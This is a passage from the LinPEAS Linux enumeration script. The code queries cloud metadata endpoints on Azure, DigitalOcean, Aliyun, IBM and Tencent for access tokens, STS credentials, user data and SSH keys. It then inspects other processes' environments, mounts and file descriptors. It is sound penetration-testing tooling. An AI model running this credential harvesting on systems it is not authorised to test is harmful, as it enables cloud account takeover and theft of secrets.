   5721   if [ "$az_req" ]; then
   5722     print_3title "Instance details" "T1552.005,T1580"
   5723     exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION"
   5724     echo ""
   5725     print_3title "Load Balancer details" "T1552.005,T1580"
   5726     exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"
   5727     echo ""
   5728     print_3title "User Data" "T1552.005,T1580"
   5729     exec_with_jq eval $az_req "$URL/instance/compute/userData?api-version=$API_VERSION\&format=text" | base64 -d 2>/dev/null
   5730     echo ""
   5731     print_3title "Custom Data and other configs (root needed)" "T1552.005,T1580"
   5732     (cat /var/lib/waagent/ovf-env.xml || cat /var/lib/waagent/CustomData/ovf-env.xml) 2>/dev/null | sed "s,CustomData.*,${SED_RED},"
   5733     echo ""
   5734     print_3title "Management token" "T1552.005,T1580"
   5735     print_info "This is the default VM managed identity token. If several user-assigned identities exist and no system identity is present, Azure may require client_id/object_id/msi_res_id."
   5736     exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"
   5737     echo ""
   5738     print_3title "Graph token" "T1552.005,T1580"
   5739     print_info "This is the default VM managed identity token."
   5740     exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
   5741     echo ""
   5742     print_3title "Vault token" "T1552.005,T1580"
   5743     print_info "This is the default VM managed identity token."
   5744     exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"
   5745     echo ""
   5746     print_3title "Storage token" "T1552.005,T1580"
   5747     print_info "This is the default VM managed identity token."
   5748     exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
   5749     echo ""
   5750     print_3title "Attached user-assigned managed identities and tokens" "T1552.005,T1580"
   5751     print_info "LinPEAS tries to discover all attached UAIs by using the default Management token to read the VM ARM identity block. If that token cannot read Microsoft.Compute/virtualMachines/read, IMDS can still issue tokens for known client_id/object_id/msi_res_id values, but the full attached identity list cannot be discovered from IMDS alone."
   5752     _az_vm_instance_json="$(az_vm_request "$URL/instance?api-version=$API_VERSION")"
   5753     _az_vm_resource_id="$(printf "%s" "$_az_vm_instance_json" | az_vm_json_value ".compute.resourceId" "resourceId")"
   5754     _az_vm_mgmt_token_json="$(az_vm_request "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/")"
   5755     _az_vm_mgmt_token="$(printf "%s" "$_az_vm_mgmt_token_json" | az_vm_json_value ".access_token" "access_token")"
   5756     if [ "$_az_vm_resource_id" ] && [ "$_az_vm_mgmt_token" ]; then
   5757       _az_vm_arm_json="$(az_vm_request_arm "$_az_vm_mgmt_token" "https://management.azure.com${_az_vm_resource_id}?api-version=2024-07-01")"
   5758       if printf "%s" "$_az_vm_arm_json" | grep -q '"userAssignedIdentities"'; then
   5759         if [ "$(command -v jq || echo -n '')" ]; then
   5760           printf "%s" "$_az_vm_arm_json" | jq '.identity'
   5761           printf "%s" "$_az_vm_arm_json" | jq -r '.identity.userAssignedIdentities // {} | to_entries[] | [.key, .value.clientId, .value.principalId] | @tsv' 2>/dev/null | while IFS="$(printf '\t')" read -r _az_vm_uai_id _az_vm_uai_client_id _az_vm_uai_principal_id; do
   5762             if [ "$_az_vm_uai_client_id" ]; then
   5763               print_info "Requesting tokens for UAI client_id=$_az_vm_uai_client_id principal_id=$_az_vm_uai_principal_id resource_id=$_az_vm_uai_id"
   5764               az_vm_print_standard_tokens " for UAI $_az_vm_uai_client_id" "client_id=$_az_vm_uai_client_id"
   5765             fi
   5766           done
   5767         else
   5768           echo "$_az_vm_arm_json" | sed "s,access_token,${SED_RED},g"
   5769           print_info "Install jq to parse all attached user-assigned identities and request tokens for each one automatically."
   5770           az_vm_try_wire_identity_tokens
   5771         fi
   5772       else
   5773         echo "Could not read attached user-assigned identities from ARM with the default managed identity token."
   5774         az_vm_try_wire_identity_tokens
   5775       fi
   5776     else
   5777       echo "Could not obtain the VM resource ID or default Management token needed for ARM identity discovery."
   5778       az_vm_try_wire_identity_tokens
   5779     fi
   5780     echo ""
   5781   fi
   5782   echo ""
   5783 fi
   5784 
   5785 fi
   5786 
   5787 if check_mitre_filter "T1552.005,T1580"; then
   5788 API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp
   5789 if [ "$is_az_app" = "Yes" ]; then
   5790   print_2title "Azure App Service Enumeration" "T1552.005,T1580"
   5791   HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER"
   5792   set_azure_request_command
   5793   if [ "$az_req" ]; then
   5794     print_azure_standard_identity_tokens
   5795   fi
   5796   echo ""
   5797 fi
   5798 
   5799 fi
   5800 
   5801 if check_mitre_filter "T1552.005,T1580"; then
   5802 API_VERSION="2019-08-01" #https://learn.microsoft.com/en-us/azure/app-service/overview-managed-identity?tabs=portal%2Chttp
   5803 if [ "$is_az_automation_acc" = "Yes" ]; then
   5804   print_2title "Azure Automation Account Service Enumeration" "T1552.005,T1580"
   5805   HEADER="X-IDENTITY-HEADER:$IDENTITY_HEADER"
   5806   set_azure_request_command
   5807   if [ "$az_req" ]; then
   5808     print_azure_standard_identity_tokens
   5809   fi
   5810   echo ""
   5811 fi
   5812 
   5813 fi
   5814 
   5815 if check_mitre_filter "T1552.005,T1580"; then
   5816 if [ "$is_do" = "Yes" ]; then
   5817   print_2title "DO Droplet Enumeration" "T1552.005,T1580"
   5818   do_req=""
   5819   if [ "$(command -v curl || echo -n '')" ]; then
   5820       do_req='curl -s -f -L '
   5821   elif [ "$(command -v wget || echo -n '')" ]; then
   5822       do_req='wget -q -O - '
   5823   else 
   5824       echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
   5825   fi
   5826   if [ "$do_req" ]; then
   5827     URL="http://169.254.169.254/metadata"
   5828     printf "Id: "; eval $do_req "$URL/v1/id"; echo ""
   5829     printf "Region: "; eval $do_req "$URL/v1/region"; echo ""
   5830     printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo ""
   5831     printf "User data: "; eval $do_req "$URL/v1/user-data"; echo ""
   5832     printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo ""
   5833     printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces";
   5834     printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip";
   5835     printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip";
   5836     printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags";
   5837     printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features";
   5838   fi
   5839   echo ""
   5840 fi
   5841 
   5842 fi
   5843 
   5844 if check_mitre_filter "T1552.005,T1580"; then
   5845 if [ "$is_aliyun_ecs" = "Yes" ]; then
   5846   aliyun_req=""
   5847   aliyun_token=""
   5848   if [ "$(command -v curl)" ]; then 
   5849     aliyun_token=$(curl -X PUT "http://100.100.100.200/latest/api/token" -H "X-aliyun-ecs-metadata-token-ttl-seconds:1000")
   5850     aliyun_req='curl -s -f -L -H "X-aliyun-ecs-metadata-token: $aliyun_token"'
   5851   elif [ "$(command -v wget)" ]; then
   5852     aliyun_token=$(wget -q -O - --method PUT "http://100.100.100.200/latest/api/token" --header "X-aliyun-ecs-metadata-token-ttl-seconds:1000")
   5853     aliyun_req='wget -q -O --header "X-aliyun-ecs-metadata-token: $aliyun_token"'
   5854   else 
   5855     echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
   5856   fi
   5857   if [ "$aliyun_token" ]; then
   5858     print_2title "Aliyun ECS Enumeration" "T1552.005,T1580"
   5859     print_info "https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadata"
   5860     echo ""
   5861     print_3title "Instance Info" "T1552.005,T1580"
   5862     i_hostname=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/hostname)
   5863     [ "$i_hostname" ] && echo "Hostname: $i_hostname"
   5864     i_instance_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance-id)
   5865     [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
   5866     # no dup of hostname if in ACK it possibly leaks aliyun cluster service ClusterId
   5867     i_instance_name=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-name)
   5868     [ "$i_instance_name" ] && echo "Instance Name: $i_instance_name"
   5869     i_instance_type=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/instance/instance-type)
   5870     [ "$i_instance_type" ] && echo "Instance Type: $i_instance_type"
   5871     i_aliyun_owner_account=$(eval $aliyun_req http://i00.100.100.200/latest/meta-data/owner-account-id)
   5872     [ "$i_aliyun_owner_account" ] && echo "Aliyun Owner Account: $i_aliyun_owner_account"
   5873     i_region_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/region-id)
   5874     [ "$i_region_id" ] && echo "Region ID: $i_region_id"
   5875     i_zone_id=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/zone-id)
   5876     [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id"
   5877     echo ""
   5878     print_3title "Network Info" "T1552.005,T1580"
   5879     i_pub_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/public-ipv4)
   5880     [ "$i_pub_ipv4" ] && echo "Public IPv4: $i_pub_ipv4"
   5881     i_priv_ipv4=$(eval $aliyun_req http://100.100.100.200/latest/meta-data/private-ipv4)
   5882     [ "$i_priv_ipv4" ] && echo "Private IPv4: $i_priv_ipv4"
   5883     net_dns=$(eval $aliyun_req  http://100.100.100.200/latest/meta-data/dns-conf/nameservers)
   5884     [ "$net_dns" ] && echo "DNS: $net_dns"
   5885     echo "========"
   5886     for mac in $(eval $aliyun_req  http://100.100.100.200/latest/meta-data/network/interfaces/macs/); do
   5887       echo "  Mac: $mac"
   5888       echo "  Mac interface id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/network-interface-id)
   5889       echo "  Mac netmask: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/netmask)
   5890       echo "  Mac vpc id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-id)
   5891       echo "  Mac vpc cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-cidr-block)
   5892       echo "  Mac vpc cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vpc-ipv6-cidr-blocks)
   5893       echo "  Mac vswitch id: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-id)
   5894       echo "  Mac vswitch cidr: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-cidr-block)
   5895       echo "  Mac vswitch cidr (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/vswitch-ipv6-cidr-block)
   5896       echo "  Mac private ips: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/private-ipv4s)
   5897       echo "  Mac private ips (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6s)
   5898       echo "  Mac gateway: "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/gateway)
   5899       echo "  Mac gateway (v6): "$(eval $aliyun_req http://100.100.100.200/latest/meta-data/network/interfaces/macs/$mac/ipv6-gateway)
   5900       echo "======="
   5901     done
   5902     echo ""
   5903     print_3title "Service account " "T1552.005,T1580"
   5904     for sa in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/"); do 
   5905       echo "  Name: $sa"
   5906       echo "  STS Token: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/ram/security-credentials/$sa")
   5907       echo "  =============="
   5908     done
   5909     echo ""
   5910     print_3title "Possbile admin ssh Public keys" "T1552.005,T1580"
   5911     for key in $(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/"); do
   5912       echo "  Name: $key"
   5913       echo "  Key: "$(eval $aliyun_req "http://100.100.100.200/latest/meta-data/public-keys/${key}openssh-key")
   5914       echo "  =============="
   5915     done
   5916   fi
   5917 fi
   5918 
   5919 fi
   5920 
   5921 if check_mitre_filter "T1552.005,T1580"; then
   5922 if [ "$is_ibm_vm" = "Yes" ]; then
   5923   print_2title "IBM Cloud Enumeration" "T1552.005,T1580"
   5924   if ! [ "$IBM_TOKEN" ]; then
   5925     echo "Couldn't get the metadata token:("
   5926   else
   5927     TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN"
   5928     ACCEPT_HEADER="Accept: application/json"
   5929     URL="http://169.254.169.254/latest/meta-data"
   5930     ibm_req=""
   5931     if [ "$(command -v curl || echo -n '')" ]; then
   5932         ibm_req="curl -s -f -L -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
   5933     elif [ "$(command -v wget || echo -n '')" ]; then
   5934         ibm_req="wget -q -O - --header '$TOKEN_HEADER' -H '$ACCEPT_HEADER'"
   5935     else 
   5936         echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
   5937     fi
   5938     if [ "$ibm_req" ]; then
   5939       print_3title "Instance Details" "T1552.005,T1580"
   5940       exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01"
   5941       print_3title "Keys and User data" "T1552.005,T1580"
   5942       exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01"
   5943       exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01"
   5944       print_3title "Placement Groups" "T1552.005,T1580"
   5945       exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01"
   5946       print_3title "IAM credentials" "T1552.005,T1580"
   5947       exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01"
   5948     fi
   5949   fi
   5950   echo ""
   5951 fi
   5952 
   5953 fi
   5954 
   5955 if check_mitre_filter "T1552.005,T1580"; then
   5956 if [ "$is_tencent_cvm" = "Yes" ]; then
   5957   tencent_req=""
   5958   if [ "$(command -v curl)" ]; then 
   5959     tencent_req='curl --connect-timeout 2 -sfkG'
   5960   elif [ "$(command -v wget)" ]; then
   5961     tencent_req='wget -q --timeout 2 --tries 1  -O -'
   5962   else 
   5963     echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
   5964   fi
   5965     print_2title "Tencent CVM Enumeration" "T1552.005,T1580"
   5966     print_info "https://cloud.tencent.com/document/product/213/4934"
   5967     # Todo: print_info "Hacktricks Documents needs to be updated"
   5968     echo ""
   5969     print_3title "Instance Info" "T1552.005,T1580"
   5970     i_tencent_owner_account=$(eval $tencent_req http://169.254.0.23/latest/meta-data/app-id)
   5971     [ "$i_tencent_owner_account" ] && echo "Tencent Owner Account: $i_tencent_owner_account"
   5972     i_hostname=$(eval $tencent_req http://169.254.0.23/latest/meta-data/hostname)
   5973     [ "$i_hostname" ] && echo "Hostname: $i_hostname"
   5974     i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-id)
   5975     [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
   5976     i_instance_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/uuid)
   5977     [ "$i_instance_id" ] && echo "Instance ID: $i_instance_id"
   5978     i_instance_name=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance-name)
   5979     [ "$i_instance_name" ] && echo "Instance Name: $i_instance_name"
   5980     i_instance_type=$(eval $tencent_req http://169.254.0.23/latest/meta-data/instance/instance-type)
   5981     [ "$i_instance_type" ] && echo "Instance Type: $i_instance_type"
   5982     i_region_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/region)
   5983     [ "$i_region_id" ] && echo "Region ID: $i_region_id"
   5984     i_zone_id=$(eval $tencent_req http://169.254.0.23/latest/meta-data/placement/zone)
   5985     [ "$i_zone_id" ] && echo "Zone ID: $i_zone_id"
   5986     echo ""
   5987     print_3title "Network Info" "T1552.005,T1580"
   5988     for mac_tencent in $(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/); do
   5989       echo "  Mac: $mac_tencent"
   5990       echo "  Primary IPv4: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/primary-local-ipv4)
   5991       echo "  Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/public-ipv4s)
   5992       echo "  Mac vpc id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/vpc-id)
   5993       echo "  Mac subnet id: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/subnet-id)
   5994       for lipv4 in $(eval $tencent_req  http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s); do
   5995         echo "  Mac local ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/local-ipv4)
   5996         echo "  Mac gateways: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/gateway)
   5997         echo "  Mac public ips: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4)
   5998         echo "  Mac public ips mode: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/public-ipv4-mode)
   5999         echo "  Mac subnet mask: "$(eval $tencent_req http://169.254.0.23/latest/meta-data/network/interfaces/macs/$mac_tencent/local-ipv4s/$lipv4/subnet-mask)
   6000       done
   6001     echo "======="
   6002     done
   6003     echo ""
   6004     print_3title "Service account " "T1552.005,T1580"
   6005     for sa_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/"); do 
   6006       echo "  Name: $sa_tencent"
   6007       echo "  STS Token: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/cam/security-credentials/$sa_tencent")
   6008       echo "  =============="
   6009     done
   6010     echo ""
   6011     print_3title "Possbile admin ssh Public keys" "T1552.005,T1580"
   6012     for key_tencent in $(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/"); do
   6013       echo "  Name: $key_tencent"
   6014       echo "  Key: "$(eval $tencent_req "http://169.254.0.23/latest/meta-data/public-keys/${key_tencent}openssh-key")
   6015       echo "  =============="
   6016     done
   6017     echo ""
   6018     print_3title "User Data" "T1552.005,T1580"
   6019     eval $tencent_req http://169.254.0.23/latest/user-data; echo ""
   6020 fi
   6021 
   6022 fi
   6023 
   6024 fi
   6025 
   6026 fi
   6027 echo ''
   6028 echo ''
   6029 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
   6030 
   6031 if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; then
   6032 if check_mitre_filter "T1543.002,T1007,T1559,T1571,T1049,T1559.001,T1021.004,T1053.003,T1083,T1057,T1003.007,T1574,T1554,T1134.004,T1543.001"; then
   6033 print_title "Processes, Crons, Timers, Services and Sockets"
   6034 if check_mitre_filter "T1057"; then
   6035 if ! [ "$SEARCH_IN_FOLDER" ]; then
   6036   print_2title "Running processes (cleaned)" "T1057"
   6037   if [ "$NOUSEPS" ]; then
   6038     printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
   6039   fi
   6040   print_info "Check weird & unexpected processes run by root: https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes"
   6041   if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then
   6042     echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users"
   6043   fi
   6044   # Get current process environment variables
   6045   if [ -r "/proc/self/environ" ]; then
   6046     current_env_vars=$(cat /proc/self/environ 2>/dev/null | tr '\0' '\n' | sort)
   6047   else
   6048     current_env_vars=$(env 2>/dev/null | sort)
   6049   fi
   6050   # Get current process mounts
   6051   if [ -r "/proc/self/mountinfo" ]; then
   6052     current_mounts=$(cat /proc/self/mountinfo 2>/dev/null | sort)
   6053   else
   6054     current_mounts=$(mount 2>/dev/null | sort)
   6055   fi
   6056   # Function to check for unusual environment variables
   6057   check_env_vars() {
   6058     local pid="$1"
   6059     local proc_user="$2"
   6060     local proc_cmd="$3"
   6061     local findings=""
   6062     # Skip if we can't read the environment
   6063     [ ! -r "/proc/$pid/environ" ] && return
   6064     # Get process environment variables
   6065     proc_env_vars=$(cat "/proc/$pid/environ" 2>/dev/null | tr '\0' '\n' | sort)
   6066     [ -z "$proc_env_vars" ] && return
   6067     # Find environment variables that the target process has but we don't
   6068     if [ -n "$current_env_vars" ]; then
   6069       echo "$proc_env_vars" | while read -r var; do
   6070         if [ -n "$var" ]; then
   6071           # Escape special regex characters in var
   6072           escaped_var=$(echo "$var" | sed 's/[][^$.*+?(){}|]/\\&/g')
   6073           if ! echo "$current_env_vars" | grep -q "^$escaped_var$"; then
   6074             if [ -z "$findings" ]; then
   6075               findings="Has additional environment variables:"
   6076             fi
   6077             findings="$findings\n  └─ $var"
   6078           fi
   6079         fi
   6080       done
   6081     else
   6082       # If we can't get current env vars, just show all process env vars
   6083       findings="Has environment variables:"
   6084       echo "$proc_env_vars" | while read -r var; do
   6085         if [ -n "$var" ]; then
   6086           findings="$findings\n  └─ $var"
   6087         fi
   6088       done
   6089     fi
   6090     # Return findings if any
   6091     if [ -n "$findings" ]; then
   6092       echo "$findings"
   6093     fi
   6094   }
   6095   # Function to check for unusual security contexts
   6096   check_security_context() {
   6097     local pid="$1"
   6098     local proc_user="$2"
   6099     local proc_cmd="$3"
   6100     local findings=""
   6101     # Check SELinux context
   6102     if [ -r "/proc/$pid/attr/current" ]; then
   6103       selinux_ctx=$(cat "/proc/$pid/attr/current" 2>/dev/null)
   6104       if [ -n "$selinux_ctx" ] && [ "$selinux_ctx" != "unconfined" ]; then
   6105         findings="SELinux context: $selinux_ctx"
   6106       fi
   6107     fi
   6108     # Check AppArmor profile
   6109     if [ -r "/proc/$pid/attr/apparmor/current" ]; then
   6110       apparmor_profile=$(cat "/proc/$pid/attr/apparmor/current" 2>/dev/null)
   6111       if [ -n "$apparmor_profile" ] && [ "$apparmor_profile" != "unconfined" ]; then
   6112         if [ -n "$findings" ]; then
   6113           findings="$findings\n  └─ AppArmor profile: $apparmor_profile"
   6114         else
   6115           findings="AppArmor profile: $apparmor_profile"
   6116         fi
   6117       fi
   6118     fi
   6119     # Return findings if any
   6120     if [ -n "$findings" ]; then
   6121       echo "$findings"
   6122     fi
   6123   }
   6124   # Function to check for unusual mount namespaces
   6125   check_mount_namespace() {
   6126     local pid="$1"
   6127     local proc_user="$2"
   6128     local proc_cmd="$3"
   6129     local findings=""
   6130     # Skip if we can't read the mountinfo
   6131     [ ! -r "/proc/$pid/mountinfo" ] && return
   6132     # Get process mounts
   6133     proc_mounts=$(cat "/proc/$pid/mountinfo" 2>/dev/null | sort)
   6134     [ -z "$proc_mounts" ] && return
   6135     # Find mounts that the target process has but we don't
   6136     if [ -n "$current_mounts" ]; then
   6137       echo "$proc_mounts" | while read -r mount; do
   6138         if [ -n "$mount" ] && ! echo "$current_mounts" | grep -q "^$mount$"; then
   6139           mount_point=$(echo "$mount" | sed "s,.* - \(.*\),\1,")
   6140           if [ -z "$findings" ]; then
   6141             findings="Has additional mounts:"
   6142           fi
   6143           findings="$findings\n  └─ $mount_point"
   6144         fi
   6145       done
   6146     else
   6147       # If we can't get current mounts, just show all process mounts
   6148       findings="Has mounts:"
   6149       echo "$proc_mounts" | while read -r mount; do
   6150         if [ -n "$mount" ]; then
   6151           mount_point=$(echo "$mount" | sed "s,.* - \(.*\),\1,")
   6152           findings="$findings\n  └─ $mount_point"
   6153         fi
   6154       done
   6155     fi
   6156     # Return findings if any
   6157     if [ -n "$findings" ]; then
   6158       echo "$findings"
   6159     fi
   6160   }
   6161   # Function to check for unusual file descriptors
   6162   check_file_descriptors() {
   6163     local pid="$1"
   6164     local proc_user="$2"
   6165     local proc_cmd="$3"
   6166     local findings=""
   6167     # Skip if we can't read the file descriptors
   6168     [ ! -r "/proc/$pid/fd" ] && return
   6169     # Check for interesting file descriptors
   6170     for fd in /proc/$pid/fd/*; do
   6171       # Skip if fd doesn't exist or we can't access it
   6172       [ ! -e "$fd" ] && continue
   6173       # Get fd target
   6174       fd_target=$(readlink "$fd" 2>/dev/null)
   6175       [ -z "$fd_target" ] && continue
   6176       # Skip if target doesn't exist
   6177       [ ! -e "$fd_target" ] && continue
   6178       # Check if we can access the FD but not the target file
   6179       if [ -r "$fd" ] && [ ! -r "$fd_target" ]; then
   6180         if [ -z "$findings" ]; then
   6181           findings="Readable FD to unreadable file: $fd -> $fd_target"
   6182         else
   6183           findings="$findings\n  └─ Readable FD to unreadable file: $fd -> $fd_target"
   6184         fi
   6185       fi
   6186       if [ -w "$fd" ] && [ ! -w "$fd_target" ]; then
   6187         if [ -z "$findings" ]; then
   6188           findings="Writable FD to unwritable file: $fd -> $fd_target"
   6189         else
   6190           findings="$findings\n  └─ Writable FD to unwritable file: $fd -> $fd_target"
   6191         fi
   6192       fi
   6193     done
   6194     # Check for unusual number of file descriptors
   6195     fd_count=$(ls -1 "/proc/$pid/fd" 2>/dev/null | wc -l)
   6196     [ -z "$fd_count" ] && return
   6197     # If process has more than 100 file descriptors, it might be interesting
   6198     if [ "$fd_count" -gt 100 ]; then
   6199       if [ -z "$findings" ]; then
   6200         findings="Unusual number of FDs: $fd_count"
   6201       else
   6202         findings="$findings\n  └─ Unusual number of FDs: $fd_count"
   6203       fi
   6204     fi
   6205     # Return findings if any
   6206     if [ -n "$findings" ]; then
   6207       echo "$findings"
   6208     fi
   6209   }
   6210   if [ "$NOUSEPS" ]; then
   6211     print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
   6212     pslist=$(print_ps)
   6213   else
   6214     (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
   6215       echo "$psline"  | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
   6216       if [ "$(command -v capsh || echo -n '')" ] && ! echo "$psline" | grep -q "root"; then
   6217         cpid=$(echo "$psline" | awk '{print $2}')
   6218         caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
   6219         if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
   6220           printf "  └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
   6221         fi
   6222       fi
   6223     done
   6224     pslist=$(ps auxwww)
   6225     echo ""
   6226   fi
   6227   # Additional checks for each process
   6228   print_2title "Processes with unusual configurations" "T1057"
   6229   for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
   6230     # Skip if process doesn't exist or we can't access it
   6231     [ ! -d "/proc/$pid" ] && continue
   6232     # Get process user and command
   6233     proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
   6234     proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
   6235     [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
   6236     # Run all checks and collect findings
   6237     sec_findings=$(check_security_context "$pid" "$proc_user" "$proc_cmd")
   6238     mount_findings=$(check_mount_namespace "$pid" "$proc_user" "$proc_cmd")
   6239     fd_findings=$(check_file_descriptors "$pid" "$proc_user" "$proc_cmd")
   6240     env_findings=$(check_env_vars "$pid" "$proc_user" "$proc_cmd")
   6241     # If any findings exist, print process info and findings
   6242     if [ -n "$env_findings" ] || [ -n "$sec_findings" ] || [ -n "$mount_findings" ] || [ -n "$fd_findings" ]; then
   6243       echo "Process $pid ($proc_user) - $proc_cmd"
   6244       [ -n "$env_findings" ] && echo "$env_findings"
   6245       [ -n "$sec_findings" ] && echo "$sec_findings"
   6246       [ -n "$mount_findings" ] && echo "$mount_findings"
   6247       [ -n "$fd_findings" ] && echo "$fd_findings"
   6248       echo ""
   6249     fi
   6250   done
   6251   echo ""
   6252 fi
   6253 
   6254 fi
   6255 
   6256 if check_mitre_filter "T1003.007"; then
   6257 if ! [ "$SEARCH_IN_FOLDER" ]; then
   6258   print_2title "Processes with credentials in memory (root req)" "T1003.007"
